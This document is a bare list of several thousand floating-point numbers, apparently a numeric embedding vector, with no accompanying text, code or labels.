0.0050772083923220634, 0.03731345385313034, -0.015473397448658943, -0.016776278614997864, -0.01287434995174408, -0.0393550805747509, -0.03245115280151367, -0.027535125613212585, 0.0085224574431777, 0.00045919857802800834, -0.00969773717224598, -0.0007412657141685486, -0.013384757563471794, -0.0328541062772274, 0.009073159657418728, -0.00965072587132454, -0.031027385964989662, 0.021531125530600548, -0.012948225252330303, -0.003129602177068591, -0.0016361572779715061, 0.049724407494068146, 0.02844848670065403, 0.007172564510256052, -0.0058797565288841724, 0.018294068053364754, -0.05085267499089241, 0.005020123440772295, 0.011511025950312614, -0.009952940978109837, -0.00033096715924330056, -0.014707786962389946, -0.026205381378531456, -0.018723884597420692, 0.016722552478313446, -0.00324209313839674, 0.0005255179712548852, -0.0060409377329051495, 0.0018267205450683832, 0.011457298882305622, -0.004231007304042578, -0.016158416867256165, -0.020604332908988, -0.019623814150691032, -0.023384708911180496, -0.0021793043706566095, 0.00583274569362402, -0.022887732833623886, 0.0018250416032969952, -0.002296832390129566, 0.027226194739341736, 0.008327696472406387, 0.023559322580695152, -0.014398856088519096, 0.010463347658514977, -0.011591616086661816, 0.005416360683739185, 0.016561370342969894, 0.005117503926157951, -0.0014338413020595908, -0.034009236842393875, 0.007474779151380062, -0.007172564510256052, 0.013425053097307682, 0.017998570576310158, 0.008824671618640423, -0.00355941872112453, -0.01027530338615179, -0.01135656051337719, -0.01756875403225422, -0.007065110374242067, 0.0010879732435569167, -0.010517074726521969, 0.012478113174438477, -0.0002266610972583294, 0.011020766571164131, -0.012028148397803307, 0.016010668128728867, 0.005772302392870188, -0.06092650070786476, -0.010342461988329887, 0.0185895673930645, 0.005520456936210394, 0.005090640392154455, 0.001935853622853756, -0.00952984020113945, -0.009717884473502636, 0.02730678580701351, 0.008750797249376774, 0.006121528334915638, -0.006937508471310139, 0.002243105322122574, -0.003871707245707512, 0.0017729934770613909, 0.01778366230428219, 0.019032815471291542, 0.01877761259675026, -0.00017608208872843534, -0.022766847163438797, 0.005151083227247, 0.011786377057433128, 0.01692402921617031, 0.0010359251173213124, -0.0037642531096935272, -0.03030207008123398, 0.034036099910736084, -0.015701737254858017, -0.005718575324863195, -0.0013331030495464802, -0.000972963753156364, 0.00711883744224906, 0.00816651526838541, 0.027467966079711914, 0.03027520701289177, 0.008932125754654408, -0.006924076937139034, 0.014049629680812359, 0.026917263865470886, -0.021061012521386147, -0.018146319314837456, 0.024781612679362297, 0.0053256964311003685, 0.01262586284428835, 0.015486828982830048, -0.0067293159663677216, 0.010718551464378834, -0.02041628770530224, -0.01186696719378233, 0.01623900793492794, -0.011161799542605877, -0.007219575811177492, -0.004704476799815893, 0.008455297909677029, 0.002286758506670594, -0.017152369022369385, 0.0038011905271559954, -0.015191330574452877, 0.005752155091613531, -0.00924777239561081, 0.0020768872927874327, 0.015473397448658943, -0.001466581248678267, -0.026997854933142662, -0.04161161929368973, 0.00020263082114979625, -0.0061517502181231976, 0.003097701584920287, -0.01087973266839981, 0.020093925297260284, -0.015486828982830048, 0.0010955285979434848, 0.033203333616256714, 0.02565467730164528, -0.013579517602920532, 0.02147739753127098, 0.0028525718953460455, -0.013035531155765057, -0.00931493192911148, -0.005711859557777643, -0.0005179625586606562, 0.03024834208190441, 0.0015035185497254133, -0.001994617749005556, -0.0007840794860385358, -0.01380785834044218, -0.003700452158227563, -0.011752797290682793, -0.017206095159053802, -0.011470730416476727, 0.007891164161264896, 0.018952226266264915, 0.021652011200785637, 0.009798475541174412, 0.026379993185400963, -0.018361227586865425, 0.005171230994164944, 0.01794484257698059, 0.0150301493704319, -0.02333098277449608, 0.009724600240588188, 0.012928077019751072, -0.013780994340777397, 0.04010726138949394, 0.009382090531289577, 0.009429101832211018, 0.001620207098312676, 0.001972791040316224, -0.005268611013889313, 0.005983852781355381, -0.01955665461719036, 0.013767562806606293, 0.0026309476234018803, -0.00025352463126182556, 0.017434434965252876, -0.003740747459232807, -0.015003285370767117, -0.021329648792743683, -0.0170449148863554, 0.002600726205855608, -0.0069106449373066425, -0.008206810802221298, 0.009442533366382122, 0.007018099073320627, 0.017595617100596428, -0.0092209093272686, 0.01210202369838953, 0.0007026494131423533, -0.006534555461257696, 0.00835456047207117, 0.012081875465810299, -0.005909978412091732, 0.00041638483526185155, -0.005735365208238363, -0.005822671577334404, 0.012464681640267372, 0.0054633719846606255, 0.00838142354041338, 0.02640685625374317, 0.006541271228343248, -0.005587615538388491, 0.0028424980118870735, -0.012384090572595596, 0.002810597652569413, 0.00393550843000412, 0.0062457723543047905, 0.013163133524358273, 0.01018128078430891, 0.00690392917022109, 0.005527172703295946, -0.013169849291443825, 0.0027316859923303127, -0.005698428023606539, 0.0024731243029236794, -0.00259904726408422, 0.008824671618640423, 0.011934126727283001, -0.01595694199204445, -0.003747463459149003, -0.030436387285590172, 0.005718575324863195, -0.0022515002638101578, 0.0035325551871210337, -0.0003431397199165076, -0.016601666808128357, 0.011067776940762997, 0.004016099032014608, 0.016574801877141, 0.008132935501635075, -0.007138985209167004, -0.007380757015198469, 0.00011249106319155544, 0.007918027229607105, -0.008280685171484947, -0.0032974991481751204, 0.005194736644625664, 0.002394212642684579, 0.02150426246225834, -0.007044962607324123, 0.005963705480098724, -0.012384090572595596, 0.009395522065460682, 0.011108072474598885, 0.009046296589076519, 0.02231016755104065, 0.00486565800383687, -0.005664848256856203, 0.0017209453508257866, 0.009798475541174412, -0.015580851584672928, 0.010913312435150146, -0.001631959923543036, -0.0016050963895395398, -0.018414955586194992, -0.010577517561614513, 0.018764181062579155, 0.004486210644245148, -0.010046962648630142, 0.010852868668735027, -0.006742747966200113, 0.01331088226288557, -0.012773611582815647, -0.005161156877875328, 0.021423671394586563, 0.019905881956219673, 0.007864300161600113, 0.01664196141064167, -0.022659393027424812, 0.0030540484003722668, 0.00041554533527232707, -0.01747473143041134, 0.0009259525686502457, -0.010107405483722687, -0.005429792683571577, 0.0012659442145377398, -0.009113455191254616, -0.017098641023039818, 0.005520456936210394, -0.01366682443767786, -0.009415669366717339, 0.0005544801824726164, 0.019167134538292885, -0.0054197185672819614, -0.05582243204116821, -0.010161132551729679, -0.013901880942285061, -0.0028542508371174335, 0.006648725364357233, -0.006443891208618879, -0.028582803905010223, 0.0012693020980805159, 0.01049021165817976, 0.0427667498588562, -0.019193997606635094, -0.006709168199449778, -0.010073826648294926, -0.022659393027424812, -0.0028643247205764055, -0.016789710149168968, -0.0031615025363862514, 0.01930145174264908, -0.02243105322122574, 0.01357280183583498, 0.004069826100021601, -0.006124886684119701, 0.0023270538076758385, -0.013485495932400227, 0.05219585448503494, 0.006165181752294302, -0.02057746984064579, -0.006141676101833582, -0.0008004494593478739, 0.00886496715247631, 0.001801535952836275, -0.012787044048309326, 0.0022179207298904657, -0.009912645444273949, -0.014868968166410923, 0.021732602268457413, -0.0018233625451102853, -0.040026672184467316, -0.00043485351488925517, -0.0010896521853283048, -0.01728668622672558, 0.013767562806606293, -0.003411669284105301, 0.010698403231799603, 0.01645391620695591, -0.000979679636657238, 0.01166549138724804, -0.00036559594445861876, 0.011383423581719398, 0.022229576483368874, -0.00620547728613019, 0.01664196141064167, -0.015352511778473854, 0.022659393027424812, -0.004573517013341188, -0.007333745714277029, -0.007951606996357441, -0.006655441131442785, 0.005973779130727053, -0.013411620631814003, -0.028663394972682, 0.006051011849194765, -0.01484210416674614, 0.005899904295802116, 0.015097307972609997, -0.003740747459232807, -0.01241095457226038, 0.02766944281756878, -0.004187353886663914, 0.026782946661114693, 0.0032236245460808277, 0.012813907116651535, -0.00512757757678628, -0.010866301134228706, 0.01095360703766346, -0.005154441110789776, -0.0008503988501615822, -0.0027199331670999527, 0.03349883109331131, 0.013915312476456165, -0.0017511668847873807, 0.0030523694586008787, 0.016467347741127014, 0.021799759939312935, -0.006057727616280317, -0.008965705521404743, 0.028663394972682, 0.024862203747034073, -0.033579420298337936, -0.0005914175417274237, -0.0030389376915991306, 0.010799141600728035, -0.006561418995261192, -0.015997236594557762, 0.00510407192632556, 0.007058394607156515, -0.022229576483368874, 0.01121552661061287, 0.0179717056453228, -0.015097307972609997, 0.012034865096211433, -0.0029986423905938864, -0.0005666527431458235, -0.024835340678691864, -0.016870301216840744, -0.0008730649715289474, -0.010147701017558575, 0.0003916200075764209, 0.012934792786836624, -0.014560037292540073, 0.004761561751365662, -0.007172564510256052, 0.001794820069335401, -0.027441103011369705, -0.005204810295253992, 0.015459965914487839, -0.0073471772484481335, 0.005379423499107361, 0.006497618276625872, -0.01738070882856846, 0.006558061111718416, 0.015782328322529793, -0.010597665794193745, 0.018455250188708305, 0.016467347741127014, 0.0123169319704175, -0.011846819892525673, 0.009039579890668392, 0.022766847163438797, 0.000489000347442925, 0.007065110374242067, -0.0042746602557599545, -0.02302205190062523, 0.013754131272435188, 0.0005746278329752386, -0.0019089900888502598, 0.01908654347062111, -0.013639961369335651, -0.015124171040952206, 0.008871682919561863, -0.006242414470762014, -0.011813240125775337, 0.00943581759929657, -0.010261870920658112, -0.002750154584646225, -0.04069826006889343, -0.013089258223772049, 0.0074344840832054615, 0.014761514030396938, 0.01423767488449812, 0.027065014466643333, 0.00816651526838541, -0.000020501811377471313, -0.0300602987408638, 0.012484828941524029, -0.011296117678284645, -0.0040429625660181046, 0.000019045828594244085, 0.038817811757326126, -0.006739390082657337, -0.00043359427945688367, -0.003989235498011112, 0.00826053787022829, 0.02081924118101597, -0.014868968166410923, 0.01472121849656105, -0.028555940836668015, 0.023438436910510063, -0.011759513057768345, 0.020402856171131134, -0.017917979508638382, 0.008757513016462326, -0.0016630208119750023, -0.00006742118421243504, 0.015903213992714882, 0.015271920710802078, -0.00943581759929657, -0.012303500436246395, 0.01623900793492794, 0.008663490414619446, 0.00414370046928525, 0.037447769194841385, -0.0057219332084059715, 0.011269253678619862, 0.006796475034207106, -0.03634636476635933, -0.025520360097289085, -0.01877761259675026, -0.006685663014650345, 0.0023539173416793346, 0.04343834146857262, -0.0045970226638019085, -0.009549987502396107, -0.006937508471310139, 0.010859585367143154, -0.004177280236035585, 0.01481524109840393, -0.024687590077519417, 0.0023001902736723423, -0.01109464094042778, -0.002740080701187253, 0.011719218455255032, 0.027911216020584106, -0.01143715064972639, -0.0020097284577786922, 0.02590988203883171, -0.0022028100211173296, -0.029737936332821846, -0.0018955583218485117, -0.006984519772231579, -0.021652011200785637, 0.00715913251042366, 0.0010560727678239346, -0.013848153874278069, -0.02292802929878235, 0.004375398624688387, 0.005335770081728697, -0.013982471078634262, -0.009422386065125465, -0.01688373275101185, -0.0029784946236759424, 0.017985139042139053, 0.01196098979562521, 0.010671540163457394, 0.001962717156857252, 0.009556703269481659, 0.004039604216814041, -0.016319599002599716, -0.01974469982087612, 0.01744786649942398, -0.04279361292719841, -0.005715217441320419, 0.014358560554683208, 0.007703119423240423, -0.01574203372001648, 0.02377423085272312, 0.01875074952840805, -0.002615836914628744, 0.024835340678691864, -0.016386758536100388, -0.015285352244973183, -0.009959656745195389, -0.0069307927042245865, -0.025775564834475517, 0.0004096689517609775, -0.009596998803317547, -0.0010695045348256826, -0.0053021907806396484, -0.005030197557061911, -0.0008247945224866271, 0.007965038530528545, -0.005329054314643145, -0.013942175544798374, -0.00877094455063343, 0.016306167468428612, -0.011470730416476727, -0.008179946802556515, 0.020322265103459358, -0.008703785948455334, -0.003760895226150751, 0.02441895566880703, 0.009758180007338524, 0.006504334043711424, -0.010006668046116829, 0.0002902521227952093, -0.009932792745530605, -0.013680255971848965, 0.006312931422144175, -0.01884477213025093, 0.0063868057914078236, -0.017340412363409996, 0.0025251724291592836, 0.014506310224533081, 0.007293450180441141, 0.0018367943121120334, -0.031403474509716034, -0.004170564003288746, 0.007078541908413172, 0.00024848771863617003, 0.019932745024561882, 0.021625148132443428, -0.011558037251234055, 0.019382042810320854, -0.03333764895796776, -0.009227625094354153, -0.007884448394179344, 0.0002646478242240846, 0.02925439178943634, 0.0015925040934234858, -0.028394758701324463, -0.01114165224134922, 0.022887732833623886, -0.004466062877327204, 0.0034687542356550694, 0.002133972244337201, -0.017555322498083115, -0.020470015704631805, 0.019811859354376793, 0.019167134538292885, 0.006594998296350241, -0.02081924118101597, -0.0016982792876660824, -0.0035426290705800056, -0.007145700976252556, -0.003403274342417717, -0.0015824302099645138, -0.012337079271674156, -0.012088592164218426, 0.016400190070271492, 0.024660727009177208, -0.013861585408449173, 0.029818525537848473, 0.022202713415026665, -0.013498927466571331, -0.003744105575606227, 0.0033092519734054804, 0.014345129020512104, 0.004220933187752962, 0.0022112049628049135, -0.014371992088854313, 0.0112356748431921, 0.028421621769666672, -0.0051208618097007275, 0.0193686094135046, -0.01723295822739601, -0.013337746262550354, -0.012290067970752716, 0.003891855012625456, 0.003989235498011112, 0.01787768490612507, -0.01946263201534748, 0.012122170999646187, 0.006494259927421808, -0.0022112049628049135, 0.0005481840344145894, -0.02368020825088024, -0.009066443890333176, 0.007394188549369574, 0.008300833404064178, 0.0036366514395922422, 0.015312216244637966, 0.007313597947359085, 0.00021207502868492156, 0.0022279946133494377, -0.003969087731093168, -0.015594283118844032, -0.017031483352184296, -0.00917389802634716, -0.03194074705243111, 0.009738032706081867, 0.01738070882856846, 0.01666882447898388, -0.04077884927392006, -0.004361966624855995, 0.013767562806606293, -0.0025083827786147594, -0.03242428973317146, 0.008052345365285873, -0.00877094455063343, 0.0006908965879119933, 0.00617525540292263, -0.01685686968266964, -0.01645391620695591, -0.015218193642795086, -0.006964372005313635, 0.014385424554347992, 0.012578851543366909, 0.002760228468105197, -0.0018401523120701313, 0.01532564777880907, -0.013317598961293697, -0.0048455107025802135, -0.032585471868515015, -0.0005796647747047246, -0.01357280183583498, -0.010496927425265312, 0.03508377820253372, -0.02766944281756878, -0.028609666973352432, -0.020644627511501312, -0.011470730416476727, 0.007058394607156515, -0.006474112626165152, -0.014761514030396938, -0.02119533158838749, -0.016695687547326088, -0.020255107432603836, -0.01735384576022625, -0.0300602987408638, -0.015271920710802078, -0.007212859578430653, -0.009227625094354153, -0.009026148356497288, 0.004130268935114145, -0.009053012356162071, -0.01778366230428219, -0.010684971697628498, -0.007575517520308495, -0.01946263201534748, -0.0022246367298066616, -0.020752081647515297, -0.006571492645889521, -0.0150301493704319, 0.006746105849742889, -0.01235051080584526, -0.002157477894797921, 0.006195403169840574, 0.0014825314283370972, -0.0031531075946986675, -0.013754131272435188, 0.01025515515357256, 0.0030406166333705187, 0.00777027802541852, -0.009852202609181404, -0.024378659203648567, 0.015352511778473854, 0.010893164202570915, -0.013028815388679504, -0.007454631384462118, -0.008300833404064178, -0.018522409722208977, -0.0012474755058065057, -0.013243723660707474, 0.00864334311336279, 0.0011937484377995133, 0.03629263862967491, 0.0010955285979434848, -0.0031245651189237833, 0.03271978721022606, 0.02218928188085556, -0.008965705521404743, -0.007488211151212454, 0.021866919472813606, 0.011417003348469734, -0.01716580055654049, 0.009361942298710346, -0.008126219734549522, -0.01688373275101185, -0.014089925214648247, 0.0072733028791844845, 0.0013414978748187423, -0.020738650113344193, -0.016292735934257507, -0.006917360704392195, 0.0028777564875781536, -0.027561988681554794, -0.007024814840406179, 0.006638651713728905, 0.029093211516737938, 0.0010182959958910942, -0.010107405483722687, -0.001291968277655542, 0.00641366932541132, 0.00864334311336279, 0.014009335078299046, -0.006430459208786488, 0.007380757015198469, 0.012860918417572975, -0.000650181551463902, 0.010308882221579552, -0.04357265681028366, 0.023908548057079315, 0.0001944458344951272, 0.011296117678284645, -0.004073183983564377, -0.00737404078245163, -0.015177898108959198, 0.01747473143041134, -0.006991235539317131, -0.0010594307677820325, -0.015500260517001152, 0.003258882788941264, -0.0070919739082455635, -0.008918694220483303, 0.020496878772974014, 0.012276636436581612, -0.012928077019751072, -0.0006077875150367618, 0.0023421647492796183, -0.016104690730571747, -0.004670897498726845, 0.018508976325392723, 0.018858203664422035, 0.002081924118101597, -0.03245115280151367, 0.0034687542356550694, -0.016171850264072418, 0.028287304565310478, 0.015688305720686913, 0.0026863536331802607, -0.031161703169345856, -0.005540604703128338, 0.006061085499823093, -0.012605714611709118, -0.012619146145880222, -0.012471397407352924, 0.011477446183562279, -0.012276636436581612, -0.008153083734214306, -0.005201452411711216, 0.014680922962725163, 0.010154416784644127, 0.021531125530600548, 0.0030641222838312387, 0.0012734995689243078, 0.0009494581609033048, 0.011484161950647831, 0.017394140362739563, -0.015889782458543777, 0.00742105208337307, 0.011638627387583256, -0.012249773368239403, -0.011692354455590248, -0.006165181752294302, 0.00451643206179142, 0.012619146145880222, 0.002427792176604271, -0.02500995248556137, -0.0055808997713029385, -0.00007560616359114647, 0.01095360703766346, -0.0023975707590579987, -0.0056480588391423225, 0.018361227586865425, -0.007387472782284021, 0.0009477791609242558, -0.002753512468189001, -0.025587519630789757, -0.006017432548105717, -0.010006668046116829, 0.00031774528906680644, -0.0000894576805876568, 0.00613496033474803, -0.014264537952840328, -0.019435768947005272, -0.009852202609181404, -0.011551320552825928, -0.014855535700917244, 0.011987853795289993, -0.013512359000742435, 0.03266606107354164, -0.02484877221286297, -0.03328392282128334, -0.010382757522165775, 0.004529864061623812, -0.011725934222340584, 0.010852868668735027, -0.03290783241391182, -0.010114122182130814, -0.019932745024561882, -0.00045877884258516133, 0.03247801586985588, -0.0004944569664075971, -0.0075285062193870544, 0.007380757015198469, -0.011759513057768345, -0.02451297827064991, -0.0005439866217784584, 0.010073826648294926, -0.014210810884833336, 0.0164270531386137, -0.017917979508638382, -0.00613496033474803, 0.01214903499931097, 0.014398856088519096, -0.02785748802125454, -0.006826696451753378, 0.00020378510816954076, -0.028717121109366417, 0.01179309282451868, -0.006564776878803968, -0.006685663014650345, 0.0000813776277936995, 0.00010346659109927714, -0.005654774606227875, 0.009254488162696362, 0.025238292291760445, 0.0011945879086852074, 0.001477494603022933, -0.005258537363260984, 0.017917979508638382, 0.007911311462521553, -0.0025352463126182556, -0.015298784710466862, 0.004375398624688387, 0.007367325015366077, 0.006114812567830086, -0.000017524260329082608, -0.0027115382254123688, 0.011826672591269016, 0.002872719429433346, 0.026675492525100708, 0.01184010412544012, 0.0053021907806396484, -0.013821289874613285, -0.0002726229140534997, 0.0020886401180177927, 0.011464014649391174, 0.007797141559422016, -0.0018653369043022394, 0.017649343237280846, 0.011537889018654823, -0.005110788159072399, -0.0052618952468037605, -0.008032198064029217, -0.01034917775541544, -0.0005993926897644997, 0.012128886766731739, -0.0017243033507838845, -0.003586282255128026, -0.005718575324863195, 0.017246391624212265, 0.01670912094414234, -0.013519074767827988, -0.008206810802221298, -0.0036702307406812906, 0.037232860922813416, 0.019919313490390778, 0.00917389802634716, -0.008415003307163715, -0.00011563912994461134, -0.0020466656424105167, -0.008542604744434357, 0.007575517520308495, -0.00545329786837101, 0.012719884514808655, 0.008052345365285873, -0.010302166454494, 0.02460700087249279, 0.006917360704392195, -0.00681662280112505, 0.01889849826693535, -0.01813288778066635, 0.0020752083510160446, 0.0064271013252437115, 0.006423743441700935, 0.023317549377679825, 0.003915360663086176, -0.014506310224533081, -0.002100392710417509, -0.0008033876656554639, 0.0009343473939225078, 0.014922695234417915, -0.013270587660372257, -0.010570801794528961, 0.014371992088854313, 0.011678922921419144, 0.03325705975294113, -0.0060845911502838135, -0.019408905878663063, -0.017461299896240234, -0.0004377917211968452, 0.01532564777880907, 0.013505643233656883, 0.020738650113344193, -0.0064707547426223755, 0.01635989360511303, -0.013740699738264084, 0.004170564003288746, 0.0035325551871210337, 0.010698403231799603, -0.011974421329796314, 0.009140318259596825, 0.006571492645889521, -0.005621195305138826, 0.0056245531886816025, 0.005329054314643145, 0.015983805060386658, -0.02126248925924301, -0.00807249266654253, 0.0036198615562170744, -0.005779018625617027, 0.0015438138507306576, 0.013438484631478786, 0.019852153956890106, 0.00938880629837513, -0.01236394327133894, 0.012686305679380894, -0.016158416867256165, 0.0005767265683971345, 0.013438484631478786, -0.026447152718901634, -0.008603047579526901, 0.0052820430137217045, 0.01707177795469761, -0.024002570658922195, -0.004687687382102013, 0.007897879928350449, 0.003599714022129774, 0.004644033964723349, 0.01688373275101185, 0.008448582142591476, 0.008932125754654408, -0.008515741676092148, -0.003959013614803553, 0.016306167468428612, -0.011363276280462742, -0.0051208618097007275, -0.006541271228343248, -0.00611145468428731, -0.020013336092233658, -0.0004722106095869094, -0.02081924118101597, -0.003398237517103553, 0.005980494897812605, -0.0053256964311003685, 0.0031547865364700556, -0.0031531075946986675, 0.014680922962725163, 0.014680922962725163, 0.010187996551394463, 0.019784994423389435, -0.013613097369670868, 0.020899832248687744, -0.0000762882482376881, -0.02358618564903736, 0.018522409722208977, 0.004288092255592346, 0.0032253034878522158, 0.012216193601489067, -0.0065076919272542, -0.015553987585008144, 0.0036937363911420107, -0.004439199343323708, 0.006618503946810961, 0.010020099580287933, -0.015594283118844032, 0.015043580904603004, -0.004858942236751318, 0.005332412198185921, 0.012518408708274364, -0.017797093838453293, 0.006027506198734045, -0.005201452411711216, 0.022444484755396843, 0.006104738917201757, 0.013478780165314674, -0.019529791548848152, 0.020711787045001984, -0.009502976201474667, 0.008979137055575848, -0.00608794903382659, 0.013411620631814003, 0.016561370342969894, 0.001624404569156468, -0.02612479031085968, -0.03242428973317146, -0.004439199343323708, 0.0020768872927874327, 0.00011773784353863448, 0.028663394972682, -0.006114812567830086, 0.00681662280112505, -0.0018602999625727534, 0.014371992088854313, -0.000323621672578156, -0.0021876993123441935, -0.0042545124888420105, -0.01623900793492794, -0.0057420809753239155, -0.00552381481975317, -0.012639294378459454, -0.024190615862607956, 0.0034821860026568174, 0.0006220588111318648, 0.02311607450246811, 0.009361942298710346, 0.01633303053677082, -0.026514310389757156, -0.013673540204763412, -0.004150416702032089, -0.0227802786976099, -0.0184418186545372, -0.012639294378459454, 0.0038079062942415476, 0.002810597652569413, -0.01853584125638008, 0.001618528156541288, -0.0015463323798030615, 0.00519809452816844, -0.004100047517567873, -0.025359179824590683, -0.001997975632548332, -0.014761514030396938, 0.010899879969656467, 0.007985186763107777, 0.006161823868751526, 0.031161703169345856, 0.02578899636864662, -0.007098689675331116, -0.007051678374409676, -0.027750033885240555, 0.0036433672066777945, 0.0020281970500946045, -0.015218193642795086, -0.014345129020512104, 0.0021793043706566095, -0.028421621769666672, 0.024056296795606613, 0.013210144825279713, -0.02578899636864662, 0.017864251509308815, -0.011806524358689785, -0.0031850081868469715, -0.026420289650559425, -0.0068669915199279785, 0.0021641936618834734, 0.02048344723880291, 0.001804893952794373, -0.033579420298337936, 0.0020248391665518284, -0.0013272266369313002, 0.008132935501635075, -0.00021438361727632582, -0.007884448394179344, 0.01930145174264908, 0.010758846998214722, -0.009402237832546234, 0.003774326993152499, -0.010194712318480015, -0.030812477692961693, 0.01392874401062727, -0.009140318259596825, 0.0008890152093954384, 0.0023623122833669186, -0.008085925132036209, 0.020281970500946045, -0.011598331853747368, 0.009919361211359501, -0.0029768156819045544, 0.011692354455590248, -0.02292802929878235, 0.0005133454105816782, -0.005040271207690239, 0.010449916124343872, 0.004603738896548748, -0.022323599085211754, -0.006390164140611887, 0.0010711835930123925, 0.0026628482155501842, 0.004993259906768799, -0.0022985113319009542, 0.011316264979541302, -0.02847534976899624, -0.030140887945890427, 0.0033629790414124727, -0.0035157655365765095, -0.007562085520476103, -0.0110006183385849, -0.005483519751578569, 0.0010099010542035103, -0.0014934447826817632, 0.008280685171484947, 0.011853535659611225, 0.0060644433833658695, -0.008757513016462326, 0.007521790452301502, -0.017098641023039818, -0.00023715465795248747, -0.007367325015366077, 0.0020063703414052725, 0.011464014649391174, -0.009227625094354153, -0.018119456246495247, 0.004566801246255636, -0.0015639615012332797, -0.013532507233321667, -0.002417718293145299, -0.007353893481194973, -0.005429792683571577, -0.027441103011369705, 0.0013347819913178682, -0.003243772080168128, 0.009133602492511272, 0.00036433670902624726, 0.006316289305686951, 0.00807249266654253, 0.016279304400086403, -0.007105405442416668, -0.0026981064584106207, 0.0013456953456625342, 0.02358618564903736, -0.00842843484133482, 0.008596331812441349, 0.00737404078245163, -0.013458631932735443, 0.0072531551122665405, 0.007582233287394047, 0.005231673829257488, 0.02903948351740837, -0.011242390610277653, 0.008992569521069527, 0.004546653479337692, 0.015110739506781101, -0.003250488080084324, 0.023908548057079315, 0.017931411042809486, 0.011477446183562279, -0.007031531073153019, 0.012954941019415855, 0.002788770943880081, -0.002800523769110441, 0.004100047517567873, -0.005416360683739185, 0.009691021405160427, -0.004513074178248644, 0.014063062146306038, 0.015271920710802078, 0.0176627766340971, 0.006474112626165152, 0.003784400876611471, 0.028985757380723953, -0.004422409925609827, -0.005480161402374506, -0.004264586605131626, -0.006514407694339752, -0.02451297827064991, 0.013875016942620277, -0.016440484672784805, 0.02169230580329895, 0.02565467730164528, 0.005852892994880676, -0.003737389575690031, -0.0009393843356519938, -0.005406287033110857, -0.0035929980222135782, 0.007051678374409676, -0.02989911660552025, -0.025144271552562714, -0.01583605445921421, -0.009959656745195389, -0.0022095260210335255, 0.01664196141064167, -0.009509691968560219, -0.01070511993020773, -0.0034956177696585655, -0.005308906547725201, -0.010899879969656467, 0.012189329601824284, 0.02380109392106533, 0.01282733865082264, 0.009449249133467674, -0.010530506260693073, 0.009543271735310555, -0.02349216304719448, 0.026232244446873665, -0.021047580987215042, 0.030543841421604156, -0.0008663490880280733, -0.01583605445921421, -0.013378041796386242, 0.0013423373457044363, 0.0006812424981035292, -0.022296736016869545, 0.007682971656322479, 0.0021709096617996693, 0.013237007893621922, 0.012390806339681149, 0.02723962627351284, -0.007058394607156515, -0.001798178069293499, -0.008589616045355797, 0.02041628770530224, 0.0033646579831838608, 0.012632578611373901, 0.016507644206285477, 0.013472063466906548, -0.014009335078299046, -0.011853535659611225, -0.000012539815543277655, 0.01803886517882347, -0.01554055605083704, 0.011934126727283001, -0.008079208433628082, -0.02081924118101597, -0.011155083775520325, -0.008556036278605461, -0.010946891270577908, 0.015379374846816063, 0.009140318259596825, 0.007575517520308495, -0.02807239629328251, 0.0001872052816906944, 0.02188035100698471, -0.0004100886872038245, -0.004885805770754814, -0.018079159781336784, 0.011799808591604233, -0.0029398782644420862, 0.008535888977348804, 0.004006024915724993, -0.02721276320517063, 0.0036366514395922422, 0.00036265773815102875, -0.001945927506312728, 0.0018754106713458896, -0.002301869448274374, -0.004029530566185713, -0.0061282445676624775, 0.023223528638482094, 0.019664108753204346, 0.015204762108623981, -0.007958322763442993, 0.01723295822739601, 0.02100728638470173, -0.013263871893286705, -0.009509691968560219, -0.024459250271320343, 0.0042746602557599545, 0.013129553757607937, -0.007750130258500576, -0.015365943312644958, 0.0015370979672297835, -0.01924772374331951, 0.004455989226698875, 0.013579517602920532, 0.0013750772923231125, -0.005493593402206898, 0.0037676109932363033, 0.009576850570738316, 0.010604381561279297, 0.0002635984565131366, -0.0074344840832054615, -0.00510407192632556, -0.02361304871737957, 0.00038322515320032835, 0.014157083816826344, 0.010006668046116829, 0.027723170816898346, 0.01602409966289997, 0.012209477834403515, 0.012075159698724747, 0.016292735934257507, -0.014425719156861305, -0.0019879017490893602, 0.01806572824716568, 0.012296783737838268, -0.0003588800609577447, 0.021061012521386147, -0.004607096780091524, -0.014573468826711178, 0.012021432630717754, -0.005181304644793272, 0.000812202284578234, 0.03978489711880684, -0.004049678333103657, -0.027588853612542152, 0.0022615741472691298, -0.027494831010699272, 0.02423091046512127, 0.02017451636493206, 0.013257155194878578, -0.005708501674234867, -0.005342485848814249, 0.004378756508231163, 0.019046247005462646, -0.0021709096617996693, -0.002147404011338949, -0.026688924059271812, 0.013122837990522385, -0.005349201615899801, -0.03086620382964611, 0.0176627766340971, 0.002756870584562421, 0.0020248391665518284, 0.01896565780043602, -0.00046633422607555985, 0.011484161950647831, 0.010557370260357857, -0.0030523694586008787, 0.010967039503157139, 0.03143033757805824, 0.026944126933813095, -0.008495593443512917, 0.017958274111151695, 0.007454631384462118, -0.014882399700582027, -0.011880399659276009, 0.010147701017558575, 0.0007798820734024048, -0.0011568110203370452, -0.0031682185363024473, -0.026997854933142662, -0.016601666808128357, -0.0056044054217636585, -0.020644627511501312, -0.017595617100596428, -0.01361981313675642, -0.01039618905633688, -0.01532564777880907, -0.018267204985022545, -0.02252507582306862, -0.0006631935830228031, 0.005510383285582066, 0.023868253454566002, -0.03108111210167408, -0.009516407735645771, -0.00920076109468937, 0.021020717918872833, 0.008838104084134102, -0.016104690730571747, -0.008159799501299858, -0.01139013934880495, -0.03352569416165352, 0.014479446224868298, 0.007192712277173996, 0.006924076937139034, -0.017206095159053802, 0.013579517602920532, -0.0015186293749138713, 0.012310216203331947, -0.01889849826693535, -0.01648077927529812, 0.010382757522165775, 0.0029633839149028063, 0.012975088320672512, -0.013673540204763412, -0.004486210644245148, 0.010557370260357857, -0.00009391744242748246, 0.013693688437342644, -0.01109464094042778, 0.0002621293533593416, 0.0054432242177426815, 0.014962989836931229, -0.00011154664389323443, -0.022645961493253708, -0.004885805770754814, -0.008549320511519909, -0.006732673849910498, 0.000329498085193336, -0.02311607450246811, -0.0011257501319050789, 0.016386758536100388, 0.019946176558732986, 0.004335103090852499, -0.013545938767492771, 0.0014380387729033828, 0.0036769467405974865, -0.0005536407115869224, 0.011061061173677444, -0.007098689675331116, 0.02695756033062935, -0.010826005600392818, 0.015500260517001152, -0.016991186887025833, -0.018723884597420692, -0.02128935232758522, -0.008542604744434357, 0.008173231035470963, 0.019019383937120438, -0.019811859354376793, 0.009012716822326183, 0.0020567395258694887, -0.02565467730164528, 0.027199331670999527, 0.00005325486563378945, 0.001120713190175593, 0.01695089228451252, -0.00428473437204957, -0.005601047538220882, -0.003441890701651573, 0.011504310183227062, 0.015298784710466862, 0.0012625862145796418, 0.004372040741145611, -0.018831338733434677, -0.010060395114123821, 0.03414355590939522, -0.0013482137583196163, 